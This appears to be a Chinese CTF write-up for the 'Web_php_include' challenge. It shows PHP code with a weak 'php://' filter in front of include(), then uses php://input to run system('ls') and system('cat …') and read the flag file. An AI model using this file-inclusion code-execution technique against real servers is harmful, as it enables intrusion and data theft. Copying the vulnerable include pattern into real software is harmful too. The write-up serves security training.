Web_php_include 攻防世界

复制代码
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环
    $page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参

准备好一个Firefox 一个max hackbar

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

复制代码
<php
system("ls")
?>

随后得到fl4gisisish3r3.php 一般这种文件就是flag,

我们使用

复制代码
<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是

相关推荐
23zhgjx-zgx2 分钟前
SQL注入攻击分析报告
网络·sql·ctf
给勒布朗上上对抗呀6 小时前
XSS实战-Bugku-zombie-10
ctf·xss
曲幽6 小时前
FastAPI缓存提速实战:手把手教你用Redis为接口注入“记忆”
redis·python·cache·fastapi·web·asyncio
王解7 小时前
本地管理员
学习·ctf
曲幽1 天前
FastAPI数据库实战:从SQLAlchemy原理到高效连接管理,告别性能瓶颈
python·sqlite·flask·fastapi·web·sqlalchemy·db
A5rZ1 天前
UofTCTF 2026 Unrealistic Client-Side Challenge - Flag 1
ctf
ad禥思妙想2 天前
[LitCTF 2023]OSINT 探姬去哪了?【0~3】
ctf·misc
曲幽2 天前
重构FastAPI生产部署:用异步网关与无服务器计算应对高并发
python·serverless·fastapi·web·async·httpx·await·asyncio
ad禥思妙想2 天前
NSSCTF_MISC_WP_刷题记录(四)
ctf·misc